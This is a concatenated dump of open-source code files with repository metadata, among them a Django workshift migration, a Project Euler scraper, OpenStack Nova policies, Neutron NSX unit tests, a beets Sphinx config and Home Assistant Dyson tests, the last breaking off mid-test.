                ('preference', models.PositiveSmallIntegerField(default=0, help_text="The user's preference for this time block.", max_length=1, choices=[(0, 'Busy'), (1, 'Preferred')])),
                ('day', workshift.fields.DayField(help_text='Day of the week for this time block.', max_length=1, choices=[(0, 'Monday'), (1, 'Tuesday'), (2, 'Wednesday'), (3, 'Thursday'), (4, 'Friday'), (5, 'Saturday'), (6, 'Sunday')])),
                ('start_time', models.TimeField(help_text='Start time for this time block.')),
                ('end_time', models.TimeField(help_text='End time for this time block.')),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='WorkshiftInstance',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('date', models.DateField(help_text='Date of this workshift.')),
                ('closed', models.BooleanField(default=False, help_text='If this shift has been completed.')),
                ('blown', models.BooleanField(default=False, help_text='If this shift has been blown.')),
                ('intended_hours', models.DecimalField(default=5, help_text='Intended hours given for this shift.', max_digits=5, decimal_places=2)),
                ('hours', models.DecimalField(default=5, help_text='Number of hours actually given for this shift.', max_digits=5, decimal_places=2)),
                ('info', models.ForeignKey(blank=True, to='workshift.InstanceInfo', help_text='The weekly workshift of which this is an instance.', null=True)),
                ('logs', models.ManyToManyField(to='workshift.ShiftLogEntry', blank=True)),
                ('semester', models.ForeignKey(help_text='The semester for this workshift.', to='workshift.Semester')),
                ('weekly_workshift', models.ForeignKey(blank=True, to='workshift.RegularWorkshift', help_text='The weekly workshift of which this is an instance.', null=True)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='WorkshiftPool',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('title', models.CharField(default='Regular Workshift', help_text='The title of this workshift pool (i.e. HI Hours)', max_length=100)),
                ('sign_out_cutoff', models.PositiveSmallIntegerField(default=24, help_text='Cutoff for signing out of workshifts without requiring a substitute, in hours.')),
                ('verify_cutoff', models.PositiveSmallIntegerField(default=8, help_text='Cutoff for verifying a workshift after it has finished, in hours. After this cutoff, the shift will be marked as blown.')),
                ('hours', models.DecimalField(default=5, help_text='Default hours required per member per period (e.g., 2 weeks per period and 2 hours required per period means 2 hours required every two weeks).', max_digits=5, decimal_places=2)),
                ('weeks_per_period', models.PositiveSmallIntegerField(default=1, help_text='Number of weeks for requirement period (e.g., 2 weeks per period and 2 hours required per period means 2 hours required every two weeks). 0 makes this a semesterly requirement')),
                ('first_fine_date', models.DateField(help_text='First fine date for this semester, optional.', null=True, blank=True)),
                ('second_fine_date', models.DateField(help_text='Second fine date for this semester, optional.', null=True, blank=True)),
                ('third_fine_date', models.DateField(help_text='Third fine date for this semester, optional.', null=True, blank=True)),
                ('any_blown', models.BooleanField(default=False, help_text='If any member is allowed to mark a shift as blown.')),
                ('is_primary', models.BooleanField(default=False, help_text='Is the primary workshift pool for the house.')),
                ('managers', models.ManyToManyField(to='managers.Manager', blank=True)),
                ('semester', models.ForeignKey(help_text='The semester associated with this pool of workshift hours.', to='workshift.Semester')),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        migrations.AddField(
            model_name='regularworkshift',
            name='pool',
            field=models.ForeignKey(help_text='The workshift pool for this shift.', to='workshift.WorkshiftPool'),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='poolhours',
            name='pool',
            field=models.ForeignKey(help_text='The pool associated with these hours.', to='workshift.WorkshiftPool'),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='instanceinfo',
            name='pool',
            field=models.ForeignKey(blank=True, to='workshift.WorkshiftPool', help_text='The workshift pool for this shift.', null=True),
            preserve_default=True,
        ),
        # Pool titles are unique within a semester.
        migrations.AlterUniqueTogether(
            name='workshiftpool',
            unique_together=set([('semester', 'title')]),
        ),
        migrations.CreateModel(
            name='WorkshiftProfile',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('note', models.TextField(help_text='Note for this profile. For communication between the workshifter and the workshift manager(s).', null=True, blank=True)),
                ('preference_save_time', models.DateTimeField(help_text='The time this member first saved their preferences.', null=True, blank=True)),
                ('pool_hours', models.ManyToManyField(to='workshift.PoolHours', blank=True)),
                ('semester', models.ForeignKey(help_text='The semester for this workshift profile.', to='workshift.Semester')),
                ('time_blocks', models.ManyToManyField(to='workshift.TimeBlock', blank=True)),
                ('user', models.ForeignKey(help_text='The user for this workshift profile.', to=settings.AUTH_USER_MODEL)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        migrations.AddField(
            model_name='workshiftinstance',
            name='workshifter',
            field=models.ForeignKey(blank=True, to='workshift.WorkshiftProfile', help_text='Workshifter who was signed into this shift at the time it started.', null=True),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='workshiftinstance',
            name='verifier',
            field=models.ForeignKey(blank=True, to='workshift.WorkshiftProfile', help_text='Workshifter who verified that this shift was completed.', null=True),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='workshiftinstance',
            name='liable',
            field=models.ForeignKey(blank=True, to='workshift.WorkshiftProfile', help_text='Workshifter who is liable for this shift if no one else signs in.', null=True),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='shiftlogentry',
            name='person',
            field=models.ForeignKey(blank=True, to='workshift.WorkshiftProfile', help_text='Person who made this entry.', null=True),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='regularworkshift',
            name='current_assignees',
            field=models.ManyToManyField(to='workshift.WorkshiftProfile', blank=True),
            preserve_default=True,
        ),
        migrations.CreateModel(
            name='WorkshiftRating',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('rating', models.PositiveSmallIntegerField(default=1, help_text='Rating for the workshift type.', max_length=1, choices=[(0, 'Dislike'), (1, 'Indifferent'), (2, 'Like')])),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        migrations.AddField(
            model_name='workshiftprofile',
            name='ratings',
            field=models.ManyToManyField(to='workshift.WorkshiftRating', blank=True),
            preserve_default=True,
        ),
        # One profile per user per semester.
        migrations.AlterUniqueTogether(
            name='workshiftprofile',
            unique_together=set([('user', 'semester')]),
        ),
        migrations.CreateModel(
            name='WorkshiftType',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('title', models.CharField(help_text='The title of this workshift type (e.g., "Pots"), must be unique.', unique=True, max_length=255)),
                ('description', models.TextField(help_text='A description for this workshift type.', null=True, blank=True)),
                ('quick_tips', models.TextField(help_text='Quick tips to the workshifter.', null=True, blank=True)),
                ('rateable', models.BooleanField(default=True, help_text='Whether this workshift type is shown in preferences.')),
                ('assignment', models.CharField(default='A', help_text='How assignment to this workshift works. This can be automatic, manual-only, or no assignment (i.e. Manager shifts, which are internally assigned.', max_length=1, choices=[('A', 'Auto-assign'), ('M', 'Manually assign'), ('O', 'No assignment')])),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        migrations.AddField(
            model_name='workshiftrating',
            name='workshift_type',
            field=models.ForeignKey(help_text='The workshift type being rated.', to='workshift.WorkshiftType'),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='regularworkshift',
            name='workshift_type',
            field=models.ForeignKey(help_text='The workshift type for this weekly workshift.', to='workshift.WorkshiftType'),
            preserve_default=True,
        ),
    ]
|
{
"content_hash": "6f7aa4aa6b113e1cf3917f5550c3d093",
"timestamp": "",
"source": "github",
"line_count": 267,
"max_line_length": 321,
"avg_line_length": 68.42696629213484,
"alnum_prop": 0.6079365079365079,
"repo_name": "knagra/farnsworth",
"id": "786a674727648b4347e20eb7e42a6f227e486843",
"size": "18294",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "workshift/migrations/0001_initial.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "189846"
},
{
"name": "HTML",
"bytes": "3022838"
},
{
"name": "JavaScript",
"bytes": "936810"
},
{
"name": "PHP",
"bytes": "2274"
},
{
"name": "Python",
"bytes": "742542"
}
],
"symlink_target": ""
}
|
"""Extracts Problem definitions from projecteuler.net and saves each to seperate
file with common Python Template"""
from __future__ import print_function
import urllib2
import sys
from bs4 import BeautifulSoup
def main():
    """Download Project Euler problem pages and write one templated .py file each.

    Usage: ./eulergen.py <start problem number> <end problem number>
    """
    if len(sys.argv) != 3:
        print('usage: ./eulergen.py <start problem number> <end problem number>')
        sys.exit(1)
    start = int(sys.argv[1])
    end = int(sys.argv[2])
    for i in range(start, end + 1):
        url = ('http://projecteuler.net/problem=' + str(i))
        response = urllib2.urlopen(url)
        html = response.read()
        soup = BeautifulSoup(html)
        title = soup.h2.get_text()  # gets title
        # Build "<number>_<lowercased_title>.py".  The original code used
        # str.join('.py'), which interleaves the name between the characters
        # of '.py', and then wrote to an undefined variable 'filename'.
        file_name = str(i) + '_' + title.lower().replace(" ", "_") + '.py'
        problem_definition = '\n'.join(
            [tag.get_text() for tag in soup.find_all('p')])
        # 'pass' keeps the generated stub syntactically valid.
        template = '''
#!/usr/bin/python
"""
%s
%s
"""
def main():
    pass
if __name__ == '__main__':
    main()
''' % (title, problem_definition)
        # 'with' guarantees the file is closed even if write() fails.
        with open(file_name, 'w') as f:
            f.write(template)
        print('Created file %s succesfully' % file_name)
# Script entry point.
if __name__ == '__main__':
    main()
|
{
"content_hash": "0bf7c106f5ba57869ac05e02492543c4",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 81,
"avg_line_length": 24.137254901960784,
"alnum_prop": 0.5637692932575142,
"repo_name": "sai-prasanna/python-scripts",
"id": "4738e4b898d68584e8273a01269a7c8091ec4f20",
"size": "1249",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "eulergen/python2/eulergen.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7464"
}
],
"symlink_target": ""
}
|
from rqalpha.api import api_base, api_extension
def get_apis():
    """Collect the public API callables of the base and extension API modules.

    Returns a single name -> callable mapping; entries from ``api_extension``
    override same-named entries from ``api_base``.
    """
    collected = {}
    for module in (api_base, api_extension):
        for name in module.__all__:
            collected[name] = getattr(module, name)
    return collected
|
{
"content_hash": "12e8a22764d555f45541d1b506fd276c",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 87,
"avg_line_length": 34.57142857142857,
"alnum_prop": 0.6818181818181818,
"repo_name": "xclxxl414/rqalpha",
"id": "f4c057b06039822736a7d4fa3927957a27b61e9f",
"size": "847",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rqalpha/api/helper.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "2333905"
},
{
"name": "Python",
"bytes": "2597438"
},
{
"name": "Shell",
"bytes": "1154"
}
],
"symlink_target": ""
}
|
"""
Created on 2017-4-25
@author: cheng.li
"""
from alphamind.data.neutralize import neutralize
from alphamind.data.rank import rank
from alphamind.data.standardize import standardize
from alphamind.data.winsorize import winsorize_normal as winsorize
# Public API of the alphamind.data package.
__all__ = ['standardize',
           'winsorize',
           'neutralize',
           'rank']
|
{
"content_hash": "fcb98ce2d9d2d6a4138428c342686411",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 66,
"avg_line_length": 24.2,
"alnum_prop": 0.6694214876033058,
"repo_name": "wegamekinglc/alpha-mind",
"id": "a15dcf3cadd9ae5f02598c0736544137a6c639c8",
"size": "388",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "alphamind/data/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "300425"
},
{
"name": "C++",
"bytes": "8627875"
},
{
"name": "CMake",
"bytes": "102"
},
{
"name": "Jupyter Notebook",
"bytes": "2257816"
},
{
"name": "Objective-C",
"bytes": "85"
},
{
"name": "Python",
"bytes": "323052"
},
{
"name": "SourcePawn",
"bytes": "2021"
}
],
"symlink_target": ""
}
|
from oslo_policy import policy
from nova.policies import base
# Policy name governing the rescue server action.
BASE_POLICY_NAME = 'os_compute_api:os-rescue'
# Dedicated policy name for the unrescue server action.
UNRESCUE_POLICY_NAME = 'os_compute_api:os-unrescue'
DEPRECATED_REASON = """
Rescue/Unrescue API policies are made granular with new policy
for unrescue and keeping old policy for rescue.
"""
# Old combined rule that the unrescue policy falls back to during the
# deprecation window (referenced via deprecated_rule below).
DEPRECATED_POLICY = policy.DeprecatedRule(
    'os_compute_api:os-rescue',
    base.RULE_ADMIN_OR_OWNER,
    deprecated_reason=DEPRECATED_REASON,
    deprecated_since='21.0.0'
)
# Documented policy rules for the rescue and unrescue server actions.
# Both default to project-member-or-admin within project scope.
rescue_policies = [
    policy.DocumentedRuleDefault(
        name=BASE_POLICY_NAME,
        check_str=base.PROJECT_MEMBER_OR_ADMIN,
        description="Rescue a server",
        operations=[
            {
                'path': '/servers/{server_id}/action (rescue)',
                'method': 'POST'
            },
        ],
        scope_types=['project']),
    policy.DocumentedRuleDefault(
        name=UNRESCUE_POLICY_NAME,
        check_str=base.PROJECT_MEMBER_OR_ADMIN,
        description="Unrescue a server",
        operations=[
            {
                'path': '/servers/{server_id}/action (unrescue)',
                'method': 'POST'
            }
        ],
        scope_types=['project'],
        deprecated_rule=DEPRECATED_POLICY
    ),
]
def list_rules():
    """Return the rescue/unrescue policy rules for policy registration."""
    return rescue_policies
|
{
"content_hash": "19ae4cb22a3c5113ad51880110404dd2",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 65,
"avg_line_length": 25.41176470588235,
"alnum_prop": 0.6041666666666666,
"repo_name": "openstack/nova",
"id": "f9f72e92ef338396376177deda99797f7226fc5e",
"size": "1935",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "nova/policies/rescue.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "3545"
},
{
"name": "Mako",
"bytes": "1952"
},
{
"name": "Python",
"bytes": "23261880"
},
{
"name": "Shell",
"bytes": "28113"
},
{
"name": "Smarty",
"bytes": "507244"
}
],
"symlink_target": ""
}
|
import json
import mock
from neutron.common import exceptions
from neutron.plugins.nicira.common import exceptions as nvp_exc
from neutron.plugins.nicira.common import utils
from neutron.plugins.nicira.nsxlib import lsn as lsnlib
from neutron.plugins.nicira import NvpApiClient
from neutron.tests import base
class LSNTestCase(base.BaseTestCase):
    def setUp(self):
        """Patch lsnlib.do_request and build a fake NSX cluster for each test."""
        super(LSNTestCase, self).setUp()
        self.mock_request_p = mock.patch.object(lsnlib, 'do_request')
        self.mock_request = self.mock_request_p.start()
        self.cluster = mock.Mock()
        self.cluster.default_service_cluster_uuid = 'foo'
        # Ensure the patch is undone even if a test fails.
        self.addCleanup(self.mock_request_p.stop)
def test_service_cluster_None(self):
self.mock_request.return_value = None
expected = lsnlib.service_cluster_exists(None, None)
self.assertFalse(expected)
    def test_service_cluster_found(self):
        """The cluster exists when the backend returns exactly one record."""
        self.mock_request.return_value = {
            "results": [
                {
                    "_href": "/ws.v1/service-cluster/foo_uuid",
                    "display_name": "foo_name",
                    "uuid": "foo_uuid",
                    "tags": [],
                    "_schema": "/ws.v1/schema/ServiceClusterConfig",
                    "gateways": []
                }
            ],
            "result_count": 1
        }
        expected = lsnlib.service_cluster_exists(None, 'foo_uuid')
        self.assertTrue(expected)
def test_service_cluster_not_found(self):
self.mock_request.side_effect = exceptions.NotFound()
expected = lsnlib.service_cluster_exists(None, 'foo_uuid')
self.assertFalse(expected)
def test_lsn_for_network_create(self):
net_id = "foo_network_id"
tags = utils.get_tags(n_network_id=net_id)
obj = {"service_cluster_uuid": "foo", "tags": tags}
lsnlib.lsn_for_network_create(self.cluster, net_id)
self.mock_request.assert_called_once_with(
"POST", "/ws.v1/lservices-node",
json.dumps(obj), cluster=self.cluster)
def test_lsn_for_network_get(self):
net_id = "foo_network_id"
lsn_id = "foo_lsn_id"
self.mock_request.return_value = {
"results": [{"uuid": "foo_lsn_id"}],
"result_count": 1
}
result = lsnlib.lsn_for_network_get(self.cluster, net_id)
self.assertEqual(lsn_id, result)
self.mock_request.assert_called_once_with(
"GET",
("/ws.v1/lservices-node?fields=uuid&tag_scope="
"n_network_id&tag=%s" % net_id),
cluster=self.cluster)
def test_lsn_for_network_get_none(self):
net_id = "foo_network_id"
self.mock_request.return_value = {
"results": [{"uuid": "foo_lsn_id1"}, {"uuid": "foo_lsn_id2"}],
"result_count": 2
}
result = lsnlib.lsn_for_network_get(self.cluster, net_id)
self.assertIsNone(result)
def test_lsn_for_network_get_raise_not_found(self):
net_id = "foo_network_id"
self.mock_request.return_value = {
"results": [], "result_count": 0
}
self.assertRaises(exceptions.NotFound,
lsnlib.lsn_for_network_get,
self.cluster, net_id)
def test_lsn_delete(self):
lsn_id = "foo_id"
lsnlib.lsn_delete(self.cluster, lsn_id)
self.mock_request.assert_called_once_with(
"DELETE",
"/ws.v1/lservices-node/%s" % lsn_id, cluster=self.cluster)
def _test_lsn_port_host_entries_update(self, lsn_type, hosts_data):
lsn_id = 'foo_lsn_id'
lsn_port_id = 'foo_lsn_port_id'
lsnlib.lsn_port_host_entries_update(
self.cluster, lsn_id, lsn_port_id, lsn_type, hosts_data)
self.mock_request.assert_called_once_with(
'PUT',
'/ws.v1/lservices-node/%s/lport/%s/%s' % (lsn_id,
lsn_port_id,
lsn_type),
json.dumps({'hosts': hosts_data}),
cluster=self.cluster)
def test_lsn_port_dhcp_entries_update(self):
hosts_data = [{"ip_address": "11.22.33.44",
"mac_address": "aa:bb:cc:dd:ee:ff"},
{"ip_address": "44.33.22.11",
"mac_address": "ff:ee:dd:cc:bb:aa"}]
self._test_lsn_port_host_entries_update("dhcp", hosts_data)
def test_lsn_port_metadata_entries_update(self):
hosts_data = [{"ip_address": "11.22.33.44",
"device_id": "foo_vm_uuid"}]
self._test_lsn_port_host_entries_update("metadata-proxy", hosts_data)
def test_lsn_port_create(self):
port_data = {
"ip_address": "1.2.3.0/24",
"mac_address": "aa:bb:cc:dd:ee:ff",
"subnet_id": "foo_subnet_id"
}
port_id = "foo_port_id"
self.mock_request.return_value = {"uuid": port_id}
lsn_id = "foo_lsn_id"
result = lsnlib.lsn_port_create(self.cluster, lsn_id, port_data)
self.assertEqual(result, port_id)
tags = utils.get_tags(n_subnet_id=port_data["subnet_id"],
n_mac_address=port_data["mac_address"])
port_obj = {
"ip_address": port_data["ip_address"],
"mac_address": port_data["mac_address"],
"type": "LogicalServicesNodePortConfig",
"tags": tags
}
self.mock_request.assert_called_once_with(
"POST", "/ws.v1/lservices-node/%s/lport" % lsn_id,
json.dumps(port_obj), cluster=self.cluster)
def test_lsn_port_delete(self):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_port_id"
lsnlib.lsn_port_delete(self.cluster, lsn_id, lsn_port_id)
self.mock_request.assert_called_once_with(
"DELETE",
"/ws.v1/lservices-node/%s/lport/%s" % (lsn_id, lsn_port_id),
cluster=self.cluster)
def test_lsn_port_get_with_filters(self):
lsn_id = "foo_lsn_id"
port_id = "foo_port_id"
filters = {"tag": "foo_tag", "tag_scope": "foo_scope"}
self.mock_request.return_value = {
"results": [{"uuid": port_id}],
"result_count": 1
}
result = lsnlib._lsn_port_get(self.cluster, lsn_id, filters)
self.assertEqual(result, port_id)
self.mock_request.assert_called_once_with(
"GET",
("/ws.v1/lservices-node/%s/lport?fields=uuid&tag_scope=%s&"
"tag=%s" % (lsn_id, filters["tag_scope"], filters["tag"])),
cluster=self.cluster)
def test_lsn_port_get_with_filters_return_none(self):
self.mock_request.return_value = {
"results": [{"uuid": "foo1"}, {"uuid": "foo2"}],
"result_count": 2
}
result = lsnlib._lsn_port_get(self.cluster, "lsn_id", None)
self.assertIsNone(result)
def test_lsn_port_get_with_filters_raises_not_found(self):
self.mock_request.return_value = {"results": [], "result_count": 0}
self.assertRaises(exceptions.NotFound,
lsnlib._lsn_port_get,
self.cluster, "lsn_id", None)
def test_lsn_port_plug_network(self):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_lsn_port_id"
lswitch_port_id = "foo_lswitch_port_id"
lsnlib.lsn_port_plug_network(
self.cluster, lsn_id, lsn_port_id, lswitch_port_id)
self.mock_request.assert_called_once_with(
"PUT",
("/ws.v1/lservices-node/%s/lport/%s/"
"attachment") % (lsn_id, lsn_port_id),
json.dumps({"peer_port_uuid": lswitch_port_id,
"type": "PatchAttachment"}),
cluster=self.cluster)
def test_lsn_port_plug_network_raise_conflict(self):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_lsn_port_id"
lswitch_port_id = "foo_lswitch_port_id"
self.mock_request.side_effect = NvpApiClient.Conflict
self.assertRaises(
nvp_exc.LsnConfigurationConflict,
lsnlib.lsn_port_plug_network,
self.cluster, lsn_id, lsn_port_id, lswitch_port_id)
def _test_lsn_port_dhcp_configure(
self, lsn_id, lsn_port_id, is_enabled, opts):
lsnlib.lsn_port_dhcp_configure(
self.cluster, lsn_id, lsn_port_id, is_enabled, opts)
opt_array = ["%s=%s" % (key, val) for key, val in opts.iteritems()]
self.mock_request.assert_has_calls([
mock.call("PUT", "/ws.v1/lservices-node/%s/dhcp" % lsn_id,
json.dumps({"enabled": is_enabled}),
cluster=self.cluster),
mock.call("PUT",
("/ws.v1/lservices-node/%s/"
"lport/%s/dhcp") % (lsn_id, lsn_port_id),
json.dumps({"options": {"options": opt_array}}),
cluster=self.cluster)
])
def test_lsn_port_dhcp_configure_empty_opts(self):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_lsn_port_id"
is_enabled = False
opts = {}
self._test_lsn_port_dhcp_configure(
lsn_id, lsn_port_id, is_enabled, opts)
def test_lsn_port_dhcp_configure_with_opts(self):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_lsn_port_id"
is_enabled = True
opts = {"opt1": "val1", "opt2": "val2"}
self._test_lsn_port_dhcp_configure(
lsn_id, lsn_port_id, is_enabled, opts)
def _test_lsn_metadata_configure(
self, lsn_id, is_enabled, opts, expected_opts):
lsnlib.lsn_metadata_configure(
self.cluster, lsn_id, is_enabled, opts)
lsn_obj = {"enabled": is_enabled}
lsn_obj.update(expected_opts)
self.mock_request.assert_has_calls([
mock.call("PUT",
"/ws.v1/lservices-node/%s/metadata-proxy" % lsn_id,
json.dumps(lsn_obj),
cluster=self.cluster),
])
def test_lsn_port_metadata_configure_empty_secret(self):
lsn_id = "foo_lsn_id"
is_enabled = True
opts = {
"metadata_server_ip": "1.2.3.4",
"metadata_server_port": "8775"
}
expected_opts = {
"metadata_server_ip": "1.2.3.4",
"metadata_server_port": "8775",
"misc_options": []
}
self._test_lsn_metadata_configure(
lsn_id, is_enabled, opts, expected_opts)
def test_lsn_metadata_configure_with_secret(self):
lsn_id = "foo_lsn_id"
is_enabled = True
opts = {
"metadata_server_ip": "1.2.3.4",
"metadata_server_port": "8775",
"metadata_proxy_shared_secret": "foo_secret"
}
expected_opts = {
"metadata_server_ip": "1.2.3.4",
"metadata_server_port": "8775",
"misc_options": ["metadata_proxy_shared_secret=foo_secret"]
}
self._test_lsn_metadata_configure(
lsn_id, is_enabled, opts, expected_opts)
def _test_lsn_port_host_action(
self, lsn_port_action_func, extra_action, action, host):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_lsn_port_id"
lsn_port_action_func(self.cluster, lsn_id, lsn_port_id, host)
self.mock_request.assert_called_once_with(
"POST",
("/ws.v1/lservices-node/%s/lport/"
"%s/%s?action=%s") % (lsn_id, lsn_port_id, extra_action, action),
json.dumps(host), cluster=self.cluster)
def test_lsn_port_dhcp_host_add(self):
host = {
"ip_address": "1.2.3.4",
"mac_address": "aa:bb:cc:dd:ee:ff"
}
self._test_lsn_port_host_action(
lsnlib.lsn_port_dhcp_host_add, "dhcp", "add_host", host)
def test_lsn_port_dhcp_host_remove(self):
host = {
"ip_address": "1.2.3.4",
"mac_address": "aa:bb:cc:dd:ee:ff"
}
self._test_lsn_port_host_action(
lsnlib.lsn_port_dhcp_host_remove, "dhcp", "remove_host", host)
def test_lsn_port_metadata_host_add(self):
host = {
"ip_address": "1.2.3.4",
"instance_id": "foo_instance_id"
}
self._test_lsn_port_host_action(lsnlib.lsn_port_metadata_host_add,
"metadata-proxy", "add_host", host)
def test_lsn_port_metadata_host_remove(self):
host = {
"ip_address": "1.2.3.4",
"instance_id": "foo_instance_id"
}
self._test_lsn_port_host_action(lsnlib.lsn_port_metadata_host_remove,
"metadata-proxy", "remove_host", host)
|
{
"content_hash": "f5304e9eff4fb085b7b706f40d372f73",
"timestamp": "",
"source": "github",
"line_count": 326,
"max_line_length": 78,
"avg_line_length": 39.38650306748466,
"alnum_prop": 0.5407320872274143,
"repo_name": "Comcast/neutron",
"id": "86daa39aa241ef309006a09add032f77e7f33330",
"size": "13463",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "neutron/tests/unit/nicira/test_lsn_lib.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "37307"
},
{
"name": "JavaScript",
"bytes": "67928"
},
{
"name": "Python",
"bytes": "6906340"
},
{
"name": "Shell",
"bytes": "8983"
},
{
"name": "XSLT",
"bytes": "50907"
}
],
"symlink_target": ""
}
|
# Sphinx configuration for the beets documentation.

AUTHOR = u'Adrian Sampson'

# Core Sphinx settings.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.extlinks']
source_suffix = '.rst'
master_doc = 'index'
exclude_patterns = ['_build']
pygments_style = 'sphinx'

# Project identity and versioning.
project = u'beets'
copyright = u'2012, Adrian Sampson'
version = '1.3'
release = '1.3.17'

# Shorthand roles linking to the issue tracker and GitHub user profiles.
extlinks = {
    'bug': ('https://github.com/sampsyo/beets/issues/%s', '#'),
    'user': ('https://github.com/%s', ''),
}

# HTML help output.
htmlhelp_basename = 'beetsdoc'

# LaTeX output.
latex_documents = [
    ('index', 'beets.tex', u'beets Documentation',
     AUTHOR, 'manual'),
]

# Unix manual pages: (source, name, description, authors, section).
man_pages = [
    ('reference/cli', 'beet', u'music tagger and library organizer',
     [AUTHOR], 1),
    ('reference/config', 'beetsconfig', u'beets configuration file',
     [AUTHOR], 5),
]
|
{
"content_hash": "9bb795e3d1532cb3b7506550ce1a3c7d",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 68,
"avg_line_length": 21.875,
"alnum_prop": 0.6502857142857142,
"repo_name": "LordSputnik/beets",
"id": "a636220792688f770f3876cea94332394923852b",
"size": "900",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs/conf.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2951"
},
{
"name": "HTML",
"bytes": "3307"
},
{
"name": "JavaScript",
"bytes": "85950"
},
{
"name": "Python",
"bytes": "1671957"
},
{
"name": "Shell",
"bytes": "7413"
}
],
"symlink_target": ""
}
|
"""Test the Dyson air quality component."""
import json
from unittest import mock
import asynctest
from libpurecool.dyson_pure_cool import DysonPureCool
from libpurecool.dyson_pure_state_v2 import DysonEnvironmentalSensorV2State
from homeassistant.components import dyson as dyson_parent
from homeassistant.components.air_quality import (
ATTR_NO2,
ATTR_PM_2_5,
ATTR_PM_10,
DOMAIN as AIQ_DOMAIN,
)
import homeassistant.components.dyson.air_quality as dyson
from homeassistant.helpers import discovery
from homeassistant.setup import async_setup_component
def _get_dyson_purecool_device():
    """Build a mock PureCool device shaped like the Dyson web-service payload."""
    purecool = mock.Mock(spec=DysonPureCool)
    purecool.serial = "XX-XXXXX-XX"
    purecool.name = "Living room"
    purecool.connect = mock.Mock(return_value=True)
    purecool.auto_connect = mock.Mock(return_value=True)
    # Seed the environmental readings the air_quality entity will parse.
    env = purecool.environmental_state
    env.particulate_matter_25 = "0014"
    env.particulate_matter_10 = "0025"
    env.nitrogen_dioxide = "0042"
    env.volatile_organic_compounds = "0035"
    return purecool
def _get_config():
    """Return a configuration dictionary for setting up the Dyson integration."""
    device_entries = [{"device_id": "XX-XXXXX-XX", "device_ip": "192.168.0.1"}]
    return {
        dyson_parent.DOMAIN: {
            dyson_parent.CONF_USERNAME: "email",
            dyson_parent.CONF_PASSWORD: "password",
            dyson_parent.CONF_LANGUAGE: "GB",
            dyson_parent.CONF_DEVICES: device_entries,
        }
    }
@asynctest.patch("libpurecool.dyson.DysonAccount.login", return_value=True)
@asynctest.patch(
    "libpurecool.dyson.DysonAccount.devices",
    return_value=[_get_dyson_purecool_device()],
)
async def test_purecool_aiq_attributes(devices, login, hass):
    """Test state attributes.

    The mock device reports pm25="0014", pm10="0025", no2="0042",
    voc="0035"; the entity state and attributes expose them as ints.
    """
    await async_setup_component(hass, dyson_parent.DOMAIN, _get_config())
    await hass.async_block_till_done()
    fan_state = hass.states.get("air_quality.living_room")
    attributes = fan_state.attributes
    # State string matches the PM2.5 reading with leading zeros stripped.
    assert fan_state.state == "14"
    assert attributes[ATTR_PM_2_5] == 14
    assert attributes[ATTR_PM_10] == 25
    assert attributes[ATTR_NO2] == 42
    assert attributes[dyson.ATTR_VOC] == 35
@asynctest.patch("libpurecool.dyson.DysonAccount.login", return_value=True)
@asynctest.patch(
    "libpurecool.dyson.DysonAccount.devices",
    return_value=[_get_dyson_purecool_device()],
)
async def test_purecool_aiq_update_state(devices, login, hass):
    """Test state update.

    Pushes a fresh environmental-sensor message through the listener the
    air-quality sensor registered on the device, then verifies the entity
    re-reads every attribute from the new readings.
    """
    device = devices.return_value[0]
    await async_setup_component(hass, dyson_parent.DOMAIN, _get_config())
    await hass.async_block_till_done()
    event = {
        "msg": "ENVIRONMENTAL-CURRENT-SENSOR-DATA",
        "time": "2019-03-29T10:00:01.000Z",
        "data": {
            "pm10": "0080",
            "p10r": "0151",
            "hact": "0040",
            "va10": "0055",
            "p25r": "0161",
            "noxl": "0069",
